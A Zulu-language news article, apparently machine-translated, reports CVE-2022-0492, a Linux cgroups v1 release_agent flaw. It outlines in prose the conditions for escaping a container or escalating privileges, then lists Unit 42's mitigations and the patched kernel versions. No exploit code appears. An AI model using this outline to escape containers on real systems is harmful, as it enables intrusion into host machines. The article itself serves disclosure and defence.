Bathole ubungozi ku-cgroups v1 okuvumela ukuphuma esitsheni esisodwa

Zimbalwa izinsuku ezedlule zakhishwa izindaba imininingwane idaluliwe ukuba sengozini lokho kwatholakala ekusetshenzisweni kwendlela umkhawulo wezinsiza amaqoqo v1 ku-Linux kernel esivele ifakwe ohlwini ngaphansi kwe-CVE-2022-0492.

Lokhu kuba sengozini kutholwe se ingasetshenziswa ukuphuma ezitsheni ezingazodwa futhi kunemininingwane yokuthi inkinga ibikhona kusukela ku-Linux kernel 2.6.24.

Encwadini ye-blog kushiwo lokho ubungozi kungenxa yephutha eliphusile kusiphathi sefayela somenzeli, ngakho ukuhlolwa okufanele akwenziwanga lapho umshayeli eqhutshwa ngezimvume ezigcwele.

Ifayela release_agent isetshenziselwa ukuchaza uhlelo olusetshenziswa i-kernel lapho inqubo iphela eqenjini. Lolu hlelo lusebenza njengempande ngawo wonke "amandla" endaweni yamagama yempande. Umlawuli kuphela obekufanele abe nokufinyelela ekucushweni kwe-release_ejenti, kodwa empeleni, ukuhlola bekukhawulelwe ekunikezeni ukufinyelela kumsebenzisi wempande, okungazange kuvimbele ukushintsha ukulungiselelwa okuvela esiqukathini noma umsebenzisi wempande ongaphethe (CAP_SYS_ADMIN ) .

Phambilini, lesi sici besingeke sibonwe njengento engcupheni, kodwa isimo sishintshile ngokufika kwezikhala zamagama zesikhombi somsebenzisi (izikhala zamagama zomsebenzisi), ezikuvumela ukuthi udale abasebenzisi bezimpande abahlukene ezitsheni ezingadluleli nomsebenzisi oyimpande wendawo eyinhloko.

Ngenxa yalokho, ngokuhlaselwa, kwanele esitsheni esinomsebenzisi wayo wempande endaweni ehlukile ye-id yomsebenzisi ukuze uxhume isibambi sakho se-release_ejenti, okuthi, uma inqubo isiqediwe, isebenze nazo zonke amalungelo endawo yomzali.

Ngokuzenzakalela, i-cgroupfs igxunyekwe esitsheni sokufunda kuphela, kodwa ayikho inkinga yokwengeza kabusha lawa mbumbulu kwimodi yokubhala enamalungelo e-CAP_SYS_ADMIN noma ngokudala isiqukathi esifakwe isidleke esinendawo yegama lomsebenzisi ehlukile kusetshenziswa ikholi yesistimu yokumisa ukwabelana, lapho amalungelo e-CAP_SYS_ADMIN ayatholakala esitsheni esidaliwe.

Ukuhlasela kungenziwa ngokuba namalungelo ezimpande esitsheni esisodwa noma ngokusebenzisa isiqukathi ngaphandle kwefulegi elithi no_new_privs, elivimbela ukuzuza amalungelo angeziwe.

Isistimu kufanele ibe nosekelo lwezikhala zamagama olunikwe amandla umsebenzisi (onikwe amandla ngokuzenzakalela ku-Ubuntu naku-Fedora, kodwa awuvunyelwe ku-Debian naku-RHEL) futhi unokufinyelela kuqoqo lempande v1 (ngokwesibonelo, i-Docker iqhuba iziqukathi kuqoqo lempande ye-RDMA). Ukuhlasela kungenzeka futhi ngamalungelo e-CAP_SYS_ADMIN, lapho ukusekelwa kwezikhala zamagama abasebenzisi kanye nokufinyelela kuhlelo lwempande lweqembu v1 kungadingeki.

Ngokungeziwe ekuphumeni kwesiqukathi esisodwa, ubungozi buphinde buvumele izinqubo eziqalwe umsebenzisi oyimpande ngaphandle "kokukwazi" noma yimuphi umsebenzisi onamalungelo e-CAP_DAC_OVERRIDE (ukuhlasela kudinga ukufinyelela kufayela /sys/fs/cgroup/*/release_agent eliphethwe ngu root) ukuthola ukufinyelela kuwo wonke "amakhono" wesistimu.

Ngaphandle kweziqukathi, ukuba sengozini kungase futhi kuvumele izinqubo zokusingatha izimpande ngaphandle kwamakhono, noma izinqubo zokusingathwa okungezona izimpande ezinekhono le-CAP_DAC_OVERRIDE, ukukhuphula amalungelo kumakhono agcwele. Lokhu kungase kuvumele abahlaseli ukuba badlule isilinganiso sokuqina esisetshenziswa amasevisi athile, okususa amakhono ngomzamo wokukhawulela umthelela uma ukuyekethisa kwenzeka.

Iyunithi 42 incoma ukuthi abasebenzisi bathuthukele enguqulweni ye-kernel engashintshi. Kulezo ziqukathi ezisebenzayo, nika amandla i-Seccomp futhi uqinisekise ukuthi i-AppArmor noma i-SELinux ivuliwe. Abasebenzisi bePrisma Cloud bangabhekisa esigabeni esithi “Prisma Cloud Protection” ukuze babone ukuncishiswa okunikezwa yiPrisma Cloud.

Qaphela ukuthi ubungozi abunakuxhashazwa uma kusetshenziswa i-Seccomp, i-AppArmor noma izindlela zokuvikela ze-SELinux ukuze kuhlukaniswe iziqukathi ezengeziwe, njengoba i-Seccomp ivimba ucingo lwesistimu olungashare() futhi i-AppArmor ne-SELinux azivumeli ama-cgroupfs ukuthi afakwe kumodi yokubhala.

Okokugcina, kufanelekile ukusho ukuthi yalungiswa kuzinguqulo ze-kernel 5.16.12, 5.15.26, 5.10.97, 5.4.177, 4.19.229, 4.14.266 kanye ne-4.9.301. Ungalandela ukukhishwa kwezibuyekezo zephakheji ekusabalaliseni kulawa makhasi: DebianSUSEUbuntuRHELFedoraI-GentooI-Arch Linux.

Okokugcina uma unentshisekelo yokwazi kabanzi ngakho, ungabheka imininingwane kufayela le- isixhumanisi esilandelayo.


Yiba ngowokuqala ukuphawula

Shiya umbono wakho

Ikheli lakho le ngeke ishicilelwe. Ezidingekayo ibhalwe nge *

*

*

  1. Ubhekele imininingwane: Miguel Ángel Gatón
  2. Inhloso yedatha: Lawula Ugaxekile, ukuphathwa kwamazwana.
  3. Ukusemthethweni: Imvume yakho
  4. Ukuxhumana kwemininingwane: Imininingwane ngeke idluliselwe kubantu besithathu ngaphandle kwesibopho esisemthethweni.
  5. Isitoreji sedatha: Idatabase ebanjwe yi-Occentus Networks (EU)
  6. Amalungelo: Nganoma yisiphi isikhathi ungakhawulela, uthole futhi ususe imininingwane yakho.